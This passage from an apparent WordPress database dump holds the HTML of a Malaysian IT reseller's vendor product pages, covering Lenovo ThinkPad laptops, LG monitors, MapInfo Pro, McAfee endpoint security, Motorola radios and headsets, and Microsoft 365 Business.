class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad Edge Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Preferred Small Business Solution</strong>\r\nDistinctive design, SMB manageability tools.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>PREFERRED SMALL-BUSINESS LAPTOPS.</strong></p>\r\n<p class=\"hero-productDescription-body\">Put a distinctive face on your small business with these progressively designed, powerfully engineered laptops, featuring the security and productivity of Lenovo Solutions for Small Business.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad L Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream Performer, Aggressive Price</strong>\r\nTough and functional business laptops that fit the bill.</p>\r\n<p class=\"hero-productDescription-heading\"><strong>MAINSTREAM LAPTOPS</strong></p>\r\n<p class=\"hero-productDescription-body\">If it\'s productivity and price that matter most, these laptops fit the bill. The L Series, as with all of the ThinkPad family, boasts legendary reliability, our award-winning, spill-resistant keyboards, security options, and superior web-conferencing at cost-conscious pricing.</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n<h3></h3>\r\n&nbsp;\r\n<div class=\"brandListings-body\">\r\n<div class=\"brandListings-body\">\r\n<div class=\"brandListings-body\">\r\n<h3>ThinkPad P Series</h3>\r\n<b><strong>A New Breed of Mobile Performance &amp; Style</strong></b>\r\n\r\nFusing the portability of a laptop and the performance of a workstation.\r\n\r\n<img class=\"alignnone wp-image-2254 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/lenovo-thinkpad-p-series-feature-hero-300x226.png\" alt=\"\" width=\"300\" height=\"226\" />\r\n<p class=\"heroSectionContent-SubHeading\"><strong>P Series Mobile Workstations</strong></p>\r\n<p class=\"heroSectionContent-SubHeading\">Fusing the portability of a laptop and the performance of a workstation, the ThinkPad P Series laptops are ISV-certified for all major applications.Â  These systems feature lightning-fast graphics and processing, and the latest cutting-edge technology to handle your compute-intensive needsâ€”in surprisingly light packages.</p>\r\n&nbsp;\r\n<div class=\"brandListings-header\">\r\n<h3 class=\"brandListings-title\">ThinkPad A Series</h3>\r\n</div>\r\n<div class=\"brandListings-body\">\r\n<p class=\"brandListings-description\"><strong>Mainstream laptops with AMD technology</strong>\r\nHigh productivity and easy multitasking with AMD</p>\r\nMainstream business enterprise laptops with an emphasis on security. Feature-rich with professional-grade, integrated graphics, cutting-edge AMD processing, long battery life, and great storage options.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Lenovo','','publish','closed','closed','','lenovo','','','2018-12-17 11:09:32','2018-12-17 03:09:32','',0,'https://bintara.com.my/?page_id=1545',0,'page','',0),(1546,1,'2018-12-11 15:38:45','2018-12-11 07:38:45','<h3><strong>21:9 UltraWide Monitors</strong></h3>\r\nExplore all you have ever wanted in a monitor with LGâ€™s 21:9 Ultrawide. featuring a wider viewing space experience suitable for both work and gaming.\r\n\r\n<img class=\"alignnone wp-image-2260 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29WK600-W (29\" 21:9 UltraWideâ„¢ Full HD IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>29â€ 21:9 WFHD (2560 x 1080) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Design</li>\r\n 	<li>Tilt Adjustable Stand</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class=\"alignnone wp-image-2261 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/large_zoom01-1-300x176.jpg\" alt=\"\" width=\"300\" height=\"176\" />\r\n<div class=\"improve-info-key-feature\">\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">38WK95C-W (38\" Class 21:9 UltraWideÂ® WQHD+ IPS Curved LED Monitor (37.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>38\" 21:9 WQHD+ (3840x1600) IPS Display</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>3-Side Borderless Design</li>\r\n 	<li>Tilt / Height Adjustable Stand</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2262 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/34UC98-W_940_01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">34UC98-W (34\" Curved 21:9 UltraWideâ„¢ IPS Display)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>34\" 21:9 Curved WQHD IPS Display</li>\r\n 	<li>sRGB Over 99%</li>\r\n 	<li>Thunderbolt 2.0 (x 2)</li>\r\n 	<li>Screen Split 2.0 (PIP Mode)</li>\r\n 	<li>USB 3.0 Quick Charge</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2263 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM69G-B_20180118_D01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM69G-B (29\" Class 21:9 Ultrawideâ„¢ Full HD IPS Gaming Monitor (29\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 UltraWideâ„¢ Monitors</li>\r\n 	<li>1ms Motion Blur Reduction</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>DAS Mode</li>\r\n 	<li>Black Stabilizer</li>\r\n 	<li>Game Mode</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2264 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/29UM59A-P_D1_110817-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">29UM59A-P (29\" UltraWideâ„¢ IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>21:9 Full HD Workstation for Contents Creator</li>\r\n 	<li>IPS Display Professional-Grade Color Capability</li>\r\n 	<li>Versatile &amp; Perform with OnScreen Control 2.0</li>\r\n 	<li>Versatility and Performance with Screen Split</li>\r\n 	<li>Professional-Grade Color With Reader Mode</li>\r\n 	<li>Professional-Grade Color With Flicker Safe</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n[maxbutton id=\"1\" ]\r\n<div class=\"key-feature-list\"><section class=\"improve-info-feature\">\r\n<h3></h3>\r\n<h3>4K Monitors</h3>\r\n<div class=\"content-head-desc\">Boasting stunning 4K resolution for the finest clarity and detail, LGâ€™s Digital Cinema 4K and UHD 4K monitors offer immersive viewing, natural-looking images, a richer, wider color range, high-quality sound and more.</div>\r\n</section>\r\n<h4></h4>\r\n<div class=\"page-controls\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2265 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27MD5KA-B (27\" UltraFineâ„¢ 5K IPS Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<ul>\r\n 	<li>5K (5120 x 2880) IPS Display</li>\r\n 	<li>218 Pixel Per Inch</li>\r\n 	<li>P3 99% Color Spectrum</li>\r\n 	<li>Thunderboltâ„¢3</li>\r\n 	<li>Built-In Camera &amp; Speaker</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2266 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" />\r\n<div class=\"key-feature-list\"><section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4 class=\"improve-info-model none_reviews\">32UD59-B</h4>\r\n</div>\r\n<div class=\"info-text-bottom stickynav-m\">\r\n<h4 class=\"improve-info-title\">32\" 16:9 IPS 4K Monitor</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>32â€ UHD 4K (3840x2160) Display</li>\r\n 	<li>DCI-P3 95% / Color Calibrated</li>\r\n 	<li>4K@60Hz, HDCP2.2 Supported HDMIx2 &amp; DisplayPort</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>Height &amp; Tilt Adjustable</li>\r\n 	<li>OnScreen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2267 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UK600-W (27\" Class 4K UHD IPS LED Monitor with HDR 10 (27\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>27 Inch 4K UHD IPS Monitor</li>\r\n 	<li>HDR 10</li>\r\n 	<li>sRGB 99% Color Gamut</li>\r\n 	<li>AMD FreeSyncâ„¢ Technology</li>\r\n 	<li>3-Side Virtually Borderless Display</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2269 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-2-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD88-W (27â€ 16:9 IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS Monitor</li>\r\n 	<li>sRGB over 99%</li>\r\n 	<li>USB Type-C</li>\r\n 	<li>On-Screen Control with Screen Split 2.0</li>\r\n 	<li>FreeSync</li>\r\n 	<li>Game Mode &amp; Black Stabilizer</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2270 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-3-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">27UD58-B (27â€ IPS 4K Monitor)</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>Realistic Gaming Experience</li>\r\n 	<li>Clear, Live Gaming Scenes with FreeSync</li>\r\n 	<li>High-End Gaming Features</li>\r\n 	<li>Optimized Game Settings</li>\r\n 	<li>Edit Perfect Visual</li>\r\n 	<li>User-friendly, Easy On Screen Control</li>\r\n</ul>\r\n<section class=\"improve-info-text\">\r\n<div class=\"info-text-top\">\r\n<h4><img class=\"alignnone wp-image-2271 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/medium01-4-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" /></h4>\r\n<h4 class=\"improve-info-model none_reviews\">43UD79-B (43\" Class 4K UHD IPS LED Monitor (42.5\" Diagonal))</h4>\r\n</div>\r\n</section><section class=\"improve-info-feature\">\r\n<div class=\"improve-info-key-feature\">\r\n<h5 class=\"key-feature-title\">Key Features</h5>\r\n<div class=\"key-feature-list\">\r\n<ul>\r\n 	<li>4K UHD (3840 x 2160) IPS</li>\r\n 	<li>HDCP 2.2 Compatible</li>\r\n 	<li>USB Type Câ„¢</li>\r\n 	<li>4x HDMI Inputs</li>\r\n 	<li>On Screen Control</li>\r\n 	<li>Factory Calibrated</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section></div>\r\n</div>\r\n</section>','LG','','publish','closed','closed','','lg','','','2018-12-17 11:53:12','2018-12-17 03:53:12','',0,'https://bintara.com.my/?page_id=1546',0,'page','',0),(1548,1,'2018-12-11 15:39:17','2018-12-11 07:39:17','<h3>MapInfo Proâ„¢ - Desktop GIS</h3>\r\n<h4 class=\"subhead\">See it faster, solve it sooner</h4>\r\n<iframe src=\"https://www.youtube.com/embed/IkZRDLHS-0w\" width=\"898\" height=\"540\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\nAccess more data, gain richer insight and find the right answer with ease.\r\n<ul>\r\n 	<li>Flexible map displays</li>\r\n 	<li>Instant customisation</li>\r\n 	<li>Robust background maps</li>\r\n 	<li>Advanced analytics</li>\r\n 	<li>Smarter calculations</li>\r\n</ul>\r\n<h3 class=\"col-xs-12 copy-section-title\">Map a more successful future</h3>\r\n<h4>Powerful</h4>\r\nMake and share maps as beautiful as they are intelligent. Easily combine data, analytics and base maps to discover insights you wonâ€™t find in spreadsheets or charts.\r\n<h4>Simpler</h4>\r\nThe familiar ribbon-based interface works just like the applications you use every day. With our intuitive design, you donâ€™t need to be a computer whiz to become a map master.\r\n<h4>Faster</h4>\r\nVisualise data in less time than ever and update themes, layers and legends instantly. Take advantage of our next generation raster GIS capabilities with MapInfo Pro Advanced.\r\n<h4>Compatible</h4>\r\nIntegrate MapInfo Pro with your existing IT systems. Itâ€™s totally compatible with todayâ€™s most common PC data formats as well as relational and spatial databases.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','MapInfo','','publish','closed','closed','','mapinfo','','','2018-12-19 11:03:53','2018-12-19 03:03:53','',0,'https://bintara.com.my/?page_id=1548',0,'page','',0),(1549,1,'2018-12-11 15:39:31','2018-12-11 07:39:31','<h3>Enterprise security that works smarter, not harder.</h3>\r\n<h3>Simplify</h3>\r\nSimplify your back-office environment with unified workflows and common security management tools, allowing existing resources to work more efficiently.\r\n<h3>Accelerate</h3>\r\nRapidly deploy new enterprise security technologies to gain first-mover advantages of capabilities that have not yet caught the attention of cybercriminals.\r\n<h3>Orchestrate</h3>\r\nGain maximum efficacy through a business security platform approach that delivers integrated controls, automated workflows, and orchestrated systems.\r\n<h3></br></h3>\r\n<h3 id=\"dynamicTitleID\">McAfee Endpoint Protection</h3>\r\nOur new line of endpoint protection products swiftly detect, prevent, and correct advanced threats.\r\n<h3>Outmaneuver attacks through advanced, consolidated endpoint defense</h3>\r\nOur new endpoint protection technologies emphasize integration, automation, and orchestration as the foundation of the threat defense lifecycle. Harnessing the power of machine learning to detect zero-day threats in near real time, we make it easier to quickly find and remediate advanced attacks so productivity isnâ€™t compromised.\r\n\r\n&nbsp;\r\n<h3>Endpoint protection products</h3>\r\nTodayâ€™s advanced attacks require more than traditional antivirus defenses. Our enterprise endpoint security offerings are centrally managed and defend against the full threat spectrum from zero-day exploits to advanced targeted attacks, protecting Windows, Macs, and Linux systems, as well as Android and iOS mobile devices.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Endpoint</strong></li>\r\n</ul>\r\nMcAfee MVISION Endpoint provides enhanced threat detection and correction capabilities to augment basic native security controls in Microsoft Windows 10.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION Mobile</strong></li>\r\n</ul>\r\nGet on-device threat detection and protection for iOS and Android mobile devices. McAfee MVISION Mobile protects against application and network threats, using machine learning algorithms to help identify malicious behavior.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Endpoint Security</strong></li>\r\n</ul>\r\nMcAfee Endpoint Security delivers centrally managed defenses with integrated capabilities like endpoint detection and response and machine learning analysis. Protect your Windows, Mac, and Linux systems with multiple, collaborative defenses and automated responses.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee MVISION EDR</strong></li>\r\n</ul>\r\nMcAfee is thinking differently about EDR. Coming in early 2019, McAfee MVISION EDR will expandÂ McAfee Active ResponseÂ capabilities and enable all analysts to do more.\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>McAfee Embedded Control</strong></li>\r\n</ul>\r\nBlock unauthorized applications and changes on fixed-function and internet of things (IoT) devices. McAfee Embedded Control provides whitelisting and file integrity monitoring technology to combat targeted malware, unauthorized software and configuration changes.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','McAfee','','publish','closed','closed','','mcafee','','','2018-12-17 10:18:29','2018-12-17 02:18:29','',0,'https://bintara.com.my/?page_id=1549',0,'page','',0),(1550,1,'2018-12-11 15:39:44','2018-12-11 07:39:44','<h2>BLUETOOTH HEADSETS</h2>\r\n<table style=\"height: 335px;\" width=\"800\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2387\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-HZ800.png\" alt=\"\" width=\"124\" height=\"124\" /></p>\r\n<p style=\"text-align: center;\"><strong style=\"font-family: inherit; font-size: inherit;\">HZ800</strong></p>\r\n</td>\r\n<td width=\"100\">&nbsp;\r\n<p style=\"text-align: center;\"><img class=\"alignnone size-full wp-image-2389 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/S305-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /><strong>S305</strong></p>\r\n</td>\r\n<td width=\"100\">&nbsp;\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2378 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H525-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /></p>\r\n<p style=\"text-align: center;\"><strong>H525</strong></p>\r\n</td>\r\n<td width=\"100\">&nbsp;\r\n<p style=\"text-align: center;\"><img class=\"size-full wp-image-2379 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H720-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" /></p>\r\n<p style=\"text-align: center;\"><strong style=\"font-family: inherit; font-size: inherit;\">H720</strong></p>\r\n</td>\r\n<td width=\"100\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2380\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H730-Motorola.png\" alt=\"\" width=\"136\" height=\"136\" /></p>\r\n<p style=\"text-align: center;\"><strong>H730</strong></p>\r\n</td>\r\n<td width=\"100\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone  wp-image-2381\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/H790-Motorola.png\" alt=\"\" width=\"143\" height=\"143\" /></p>\r\n<p style=\"text-align: center;\"><strong>H790</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2382\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HK100-Motorola.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HK100</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2383\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HK200-HK201-HK202.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HK200 / HK201 / HK202</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2384\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HX520.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HX520</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2385\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HX550.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HX550</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2386\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/HZ720.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>HZ720</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2388\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/S10-HD.png\" alt=\"\" width=\"110\" height=\"110\" />\r\n<p style=\"text-align: center;\"><strong>S10 HD</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>WALKIE TALKIE</h2>\r\n<table style=\"height: 358px;\" width=\"997\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2400\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-XT180-Walkie-Talkies-2-Way-Radios.jpg\" alt=\"\" width=\"351\" height=\"444\" />\r\n<p style=\"text-align: center;\"><strong>Motorola XT180 Walkie Talkies &amp; 2 Way Radios</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2398\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T61-2-Pack.jpg\" alt=\"\" width=\"600\" height=\"600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T61 2 Pack</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2399\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Walkie-Talkie-TLKR-T60Z-2-Handsets.jpg\" alt=\"\" width=\"1500\" height=\"1500\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR T60Z (2 Handsets)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2397\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-TLKR-T41.jpg\" alt=\"\" width=\"600\" height=\"600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola TLKR-T41</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2401\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tlkr-t40.jpg\" alt=\"\" width=\"1600\" height=\"1600\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Walkie Talkie TLKR t40</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone  wp-image-2395\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-T260-Rechargeable-Two-Way-Radios.jpg\" alt=\"\" width=\"207\" height=\"155\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola T260 Rechargeable Two-Way Radios</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2396\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Talkabout-T465-Rechargeable-Two-Way-Radio-Bundle-.jpg\" alt=\"\" width=\"500\" height=\"500\" />\r\n<p style=\"text-align: center;\"><strong>Motorola Talkabout T465 Rechargeable Two-Way Radio BundleÂ </strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2390\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-GP328.png\" alt=\"\" width=\"427\" height=\"427\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola GP328</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2391\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-E8600-Digital.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR E8600 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6600-Digital.jpg\" alt=\"\" width=\"427\" height=\"427\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6600 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2394\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P6620-Digital.png\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P6620 Digital)</strong></p>\r\n</td>\r\n<td width=\"100\"><img class=\"alignnone size-full wp-image-2392\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Motorola-Mototrbo-XiR-P3688-Digital.jpg\" alt=\"\" width=\"324\" height=\"324\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Motorola Mototrbo (XiR P3688 Digital)</strong></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[maxbutton id=\"1\" ]','Motorola','','publish','closed','closed','','motorola','','','2018-12-18 19:04:14','2018-12-18 11:04:14','',0,'https://bintara.com.my/?page_id=1550',0,'page','',0),(1551,1,'2018-12-11 15:40:04','2018-12-11 07:40:04','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.\r\n<h3 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-outlook m-pmg-pv-1500\">Microsoft 365 Business</h3>\r\n<p class=\"no-margin body-alt pmg-pv-1535 pmg-cl-black\">An integrated solution, bringing together the best-in-class productivity of Office 365 with advanced security and device management capabilities to help safeguard your business.</p>\r\n\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000\">Get more done</h4>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Create your best work with intelligent tools built in to Office.</li>\r\n 	<li class=\"body-alt\">Get work done with enterprise grade email and calendaring.</li>\r\n 	<li class=\"body-alt\">Access your files from anywhere with online file storage.</li>\r\n 	<li class=\"body-alt\">Easily integrate with other commonly used apps and solutions.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-white pmg-pv-1015\">Work better together</h4>\r\n<ul class=\"body-alt pmg-cl-white no-margin pmg-pv-0005 pmg-list-style-none pmg-ph-0000 pmg-mv-0015\">\r\n 	<li class=\"body-alt\">Bring together teams and resources, all in one place.</li>\r\n 	<li class=\"body-alt\">Connect with customers, coworkers, and suppliers.</li>\r\n 	<li class=\"body-alt\">Host online meetings to increase collaboration and productivity.</li>\r\n 	<li class=\"body-alt\">Work anywhere from any device.</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"m-pmg-mv-3000 xs-pmg-mv-6000\">\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black xs-pmg-mv-1520 m-pmg-mv-1020\">Safeguard your data</h4>\r\n</div>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-pv-0010 pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Help protect against security threats.</li>\r\n 	<li class=\"body-alt\">Help secure your business data from accidental leaks.</li>\r\n 	<li class=\"body-alt\">Control who has access to your business information.</li>\r\n 	<li class=\"body-alt\">Gain peace of mind that you have tools to help you remain compliant.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000 x-hidden-focus\">Simplified for you</h4>\r\n<ul 